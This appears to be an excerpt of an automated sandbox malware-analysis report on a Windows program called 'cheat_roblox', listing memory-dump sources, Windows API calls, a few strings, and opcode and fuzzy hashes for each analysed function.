                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                              • String ID:
                                                                              • API String ID: 4119318379-0
                                                                              • Opcode ID: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                              • Instruction ID: e721537cb22758f6fd4f8a1a85d4aeeda945ff74ab859da1a08d3f43d8c43ee0
                                                                              • Opcode Fuzzy Hash: c58ef51af4c11ae469b78d40ba7290d4e9656f32b0895ce54e4debee0d1a06d9
                                                                              • Instruction Fuzzy Hash: 71411231B1474286F760CF62E812BAA2374EB89BC8F441176ED0EABB95CF3DE4458754
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3668304517-0
                                                                              • Opcode ID: fb01f854b328a6d61e8d667f54c21880ed41a16528d753221fb4dba11c1ecfae
                                                                              • Instruction ID: 34e3783ad21ce1057b06060f7662b87245d11858f40a332b3ca25ca1ea83aa70
                                                                              • Opcode Fuzzy Hash: fb01f854b328a6d61e8d667f54c21880ed41a16528d753221fb4dba11c1ecfae
                                                                              • Instruction Fuzzy Hash: C612A062F08B4285EE20DB65D4462BD2379EB457A8F400277DA5CE7ADADF3CE586C340

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3536497005-0
                                                                              • Opcode ID: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
                                                                              • Instruction ID: d72e2ff3fb74b3afd61fcc7632a58b037d2d58f6e909153a5a2c12d044e2326f
                                                                              • Opcode Fuzzy Hash: bf6d388e0ddc62a07829c0e0ddc79988d82f0ae4bc2505d9adb649ad5df9f7e3
                                                                              • Instruction Fuzzy Hash: 6B61D172A1864185EB308B29E40237E77A5FB847ACF101226DFAD53AE4DF3DD4548704

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                              • String ID: ]
                                                                              • API String ID: 2347093688-3352871620
                                                                              • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                              • Instruction ID: 5580ecdf10b8f7cf56258d7404fb98d9bee2191417bee7cd25161fe1668601f7
                                                                              • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                              • Instruction Fuzzy Hash: 2C119625B0D34781FA749722A64737952E9EF88BC4F0800B6D95E9BB97DE2CEC048700

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 1266772231-0
                                                                              • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                              • Instruction ID: 8daa4780184bbd3567f91dc1fa3ebbb8749dabb66de46b6016b29777d99f3c89
                                                                              • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                              • Instruction Fuzzy Hash: E3F03C21E3864282FBA09B21F896A366379FFD0744F905472F54FA6954DF2CD108CB00

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                              • String ID: EDIT
                                                                              • API String ID: 4243998846-3080729518
                                                                              • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                              • Instruction ID: fe3a26cff551708ae8b2753a3a27a0a5e5bf93eecd2f270ccb7afc9a30292895
                                                                              • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                              • Instruction Fuzzy Hash: 3D018121B18B8381FA709B22F8123B663A9EF98740F440073D94EAA695EF2CE1498740

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$Handle
                                                                              • String ID:
                                                                              • API String ID: 4209713984-0
                                                                              • Opcode ID: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                              • Instruction ID: edcd4770f60d478c4330085395b56b322896b44f7fb9b5818e3c5d9e6c87e1a9
                                                                              • Opcode Fuzzy Hash: 0323b359cf5b651ecb761d1be35a0d157ce23368862f5c076944cf5492cb83e9
                                                                              • Instruction Fuzzy Hash: 2C51E322A19A4682FB31CB25D44677E2368FF95B98F444173EB0D96AA1DF7CE885C300

                                                                              APIs
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                              • String ID:
                                                                              • API String ID: 3750147219-0
                                                                              • Opcode ID: 304a46596dca69ecdbc91b92e1cd8bc705ebb4ffd666d07f6fcf63e11144534b
                                                                              • Instruction ID: eab199dfc5f41b5c8bc0bee6cb9807a1602003727ba95895027b5edbe5b2f4e4
                                                                              • Opcode Fuzzy Hash: 304a46596dca69ecdbc91b92e1cd8bc705ebb4ffd666d07f6fcf63e11144534b
                                                                              • Instruction Fuzzy Hash: 8D51D3A2F1565284FF20DBA4D8462AD232AFF45B94F400273DA1CA6BE5DF6CD840C310

                                                                              APIs
                                                                              Similarity
                                                                              • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2359106489-0
                                                                              • Opcode ID: b5c683663b1c3982ad31c560a34f1169cd3854c9fd4e60f6051e696d97cb7788
                                                                              • Instruction ID: ddc18575b0f251b4c28fb4f8236fe2a95da3cd9ee2bdd5d5289c715bf6b9b551
                                                                              • Opcode Fuzzy Hash: b5c683663b1c3982ad31c560a34f1169cd3854c9fd4e60f6051e696d97cb7788
                                                                              • Instruction Fuzzy Hash: 3F31D662E0C64A41EA719B25944627E7369FF887A8F500273EF9DE26E5CF3CE4458600
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                              • String ID:
                                                                              • API String ID: 1452418845-0
                                                                              • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                              • Instruction ID: c05664f328ba708327caf85b1a91c0d97e685cbbd26e79d6b81e612d24099819
                                                                              • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                              • Instruction Fuzzy Hash: 05315025E0C24782FA76AB6594133B91399EF45784F4404B7E94EFB2E7DE2CB8098345
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: ErrorLast$FileHandleRead
                                                                              • String ID:
                                                                              • API String ID: 2244327787-0
                                                                              • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                              • Instruction ID: 266b411b88ad66c67041b2c260050839750e0b39e66b107c47a22a3aadd6f962
                                                                              • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                              • Instruction Fuzzy Hash: 7321A121E4C64382EA709F21A40233D73A8FB85B9CF144572DB9DEA698DF7CF8858711
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E6ECD8: ResetEvent.KERNEL32 ref: 00007FF693E6ECF1
                                                                                • Part of subcall function 00007FF693E6ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF693E6ED07
                                                                              • ReleaseSemaphore.KERNEL32 ref: 00007FF693E6E974
                                                                              • FindCloseChangeNotification.KERNELBASE ref: 00007FF693E6E993
                                                                              • DeleteCriticalSection.KERNEL32 ref: 00007FF693E6E9AA
                                                                              • CloseHandle.KERNEL32 ref: 00007FF693E6E9B7
                                                                                • Part of subcall function 00007FF693E6EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA63
                                                                                • Part of subcall function 00007FF693E6EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF693E6E95F,?,?,?,00007FF693E6463A,?,?,?), ref: 00007FF693E6EA6E
                                                                              Similarity
                                                                              • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2143293610-0
                                                                              • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                              • Instruction ID: c4f46ae9de6bd5979e940b4fb940486588913e8edc87046fcd2966b417038557
                                                                              • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                              • Instruction Fuzzy Hash: 3E014032A14A9192E668DF21E94626DB334FBC4BD0F004072EB5DA3665CF39E4B5C740
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Thread$CreatePriority
                                                                              • String ID: CreateThread failed
                                                                              • API String ID: 2610526550-3849766595
                                                                              • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                              • Instruction ID: 894d1cc15ea4167bdd0d0b572f49e5e4dfda4385a49aac866326e140642d6fdc
                                                                              • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                              • Instruction Fuzzy Hash: 53116031A09B4281FB21DF11F8421A97378FBC4798F548177E64DA6669DF7CE985C700
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: DirectoryInitializeMallocSystem
                                                                              • String ID: riched20.dll
                                                                              • API String ID: 174490985-3360196438
                                                                              • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                              • Instruction ID: 372393415f890911b30f25ca8ca56e3676621eada532abfdc0eaa998dc88b9ea
                                                                              • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                              • Instruction Fuzzy Hash: 36F04F71A18B4182EB619F21F41626AB3B4FF88754F800176EA8E96B54DF7CE559CB00
                                                                              APIs
                                                                                • Part of subcall function 00007FF693E7853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF693E7856C
                                                                                • Part of subcall function 00007FF693E6AAE0: LoadStringW.USER32 ref: 00007FF693E6AB67
                                                                                • Part of subcall function 00007FF693E6AAE0: LoadStringW.USER32 ref: 00007FF693E6AB80
                                                                                • Part of subcall function 00007FF693E51FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E51FFB
                                                                                • Part of subcall function 00007FF693E5129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF693E51396
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E801BB
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E801C1
                                                                              • SendDlgItemMessageW.USER32 ref: 00007FF693E801F2
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                              • String ID:
                                                                              • API String ID: 3106221260-0
                                                                              • Opcode ID: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                              • Instruction ID: c6d5b6d170787435a7f53856443b6d3b732e9697920135de31e7985b1570d799
                                                                              • Opcode Fuzzy Hash: a7a3b9276fd9d60c98c673be8cadfcd1c49bd858ed4eeabe3b08c1157da673f6
                                                                              • Instruction Fuzzy Hash: B951BF62F046429AFF209BA5D4422FD236AEB85BD8F400577DE1DAB796DE2CE941C340
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2272807158-0
                                                                              • Opcode ID: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                              • Instruction ID: eb51b1d59552f8c9c6415335e0de62c05234d6e734407bf3a62a40366cca6955
                                                                              • Opcode Fuzzy Hash: 0b9e157db79160e2ad51da083b57527fa928f82c130172c126627bbc10adf13b
                                                                              • Instruction Fuzzy Hash: F141D172A1878682EB208B25E44627973A4FB84BB8F105376DFAD53AD5CF3CE4908700
                                                                              APIs
                                                                              Similarity
                                                                              • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 2176759853-0
                                                                              • Opcode ID: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
                                                                              • Instruction ID: 2b6bdeee4d52ea137582a94fea8eee745c9411748d4d38829eb20266820a34a6
                                                                              • Opcode Fuzzy Hash: e08c7dfb2dc1d9463dec0fad2005500a4fe685a622722b2634dfe3f3512ff4dd
                                                                              • Instruction Fuzzy Hash: F421B472A18B8581EA248B65B44117AB3A8FB89BD0F144236EFDDA3B95CF3CD181C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: std::bad_alloc::bad_alloc
                                                                              • String ID:
                                                                              • API String ID: 1875163511-0
                                                                              • Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                              • Instruction ID: 60e68ecdb0043abb1c0cf6c666cd1c5c8d13a3cfe10a57857733c63b34f0ee5d
                                                                              • Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                              • Instruction Fuzzy Hash: BC31D812E0D68A52FB349714E4463B963B8FF40784F544077D24DA66AADF7CE956C302
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1203560049-0
                                                                              • Opcode ID: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                              • Instruction ID: 0864c3c8382989b5adc9db82d1bdd1415516ab651b73eebf4af21d81d03eddbb
                                                                              • Opcode Fuzzy Hash: ac18a83a37a21749c7aa78aaec7704104475699d89f0dcb909fab837ee55c2e9
                                                                              • Instruction Fuzzy Hash: 5121F832B1878581EA318F25E44626D7364FF88B98F005272EF9ED26A5DF3CD540C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 3118131910-0
                                                                              • Opcode ID: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                              • Instruction ID: e6ace5de03907fe5eceee18839f008f9b4cf95f3e320f2327543862a5154ba59
                                                                              • Opcode Fuzzy Hash: a0ef641f18d862fb2ede747b4f7a5cd70e7cdd2a52a9d3b4729baac44d7eebee
                                                                              • Instruction Fuzzy Hash: BB219832A1878581EE308B25F44626E7364FB85B98F505272EB9E96AA5DF3CD541C700
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                              • String ID:
                                                                              • API String ID: 1203560049-0
                                                                              • Opcode ID: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                              • Instruction ID: c09c730f18abcf73b5fb83f65181da2d70e6068e834b346ceff1b95738a1923e
                                                                              • Opcode Fuzzy Hash: bb03d890145153a6389d317eee9ce9bd5a67d6f121021ec7dbe6c19775fb5f48
                                                                              • Instruction Fuzzy Hash: EE218632A1878581EA208B29F4462297365FBC8BA4F540272EBAD97BE5DF3CE541C704
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                              • Instruction ID: 650fb692ec773defa29dbe20054e77c430aa4bc8a2038203d4939193bc2e11db
                                                                              • Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
                                                                              • Instruction Fuzzy Hash: F3E09A28E0470A46EA746F719C96379239AEF88741F1054BAD80EA63A6CE3DA8498741
                                                                              APIs
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5F895
                                                                              • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF693E5F89B
                                                                                • Part of subcall function 00007FF693E63EC8: FindClose.KERNELBASE(?,?,00000000,00007FF693E70811), ref: 00007FF693E63EFD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2129089883.00007FF693E51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF693E50000, based on PE: true
                                                                              • Associated: 00000000.00000002.2129059221.00007FF693E50000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129164971.00007FF693E98000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EAB000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129186548.00007FF693EB4000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBA000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2129225344.00007FF693EBE000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff693e50000_cheat_roblox.jbxd
                                                                              Similarity
                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                              • String ID:
                                                                              • API String ID: 3587649625-0
                                                                              • Opcode ID: f6fa25ad129010b84b8f33fd61341000d9c914db862da7234b37364a70f1a1a6
                                                                              • Instruction ID: 3b4b45f1d00837d229235da3a3cc3deb2f00020026f5726fb36f515952d494cc
                                                                              • Opcode Fuzzy Hash: f6fa25ad129010b84b8f33fd61341000d9c914db862da7234b37364a70f1a1a6
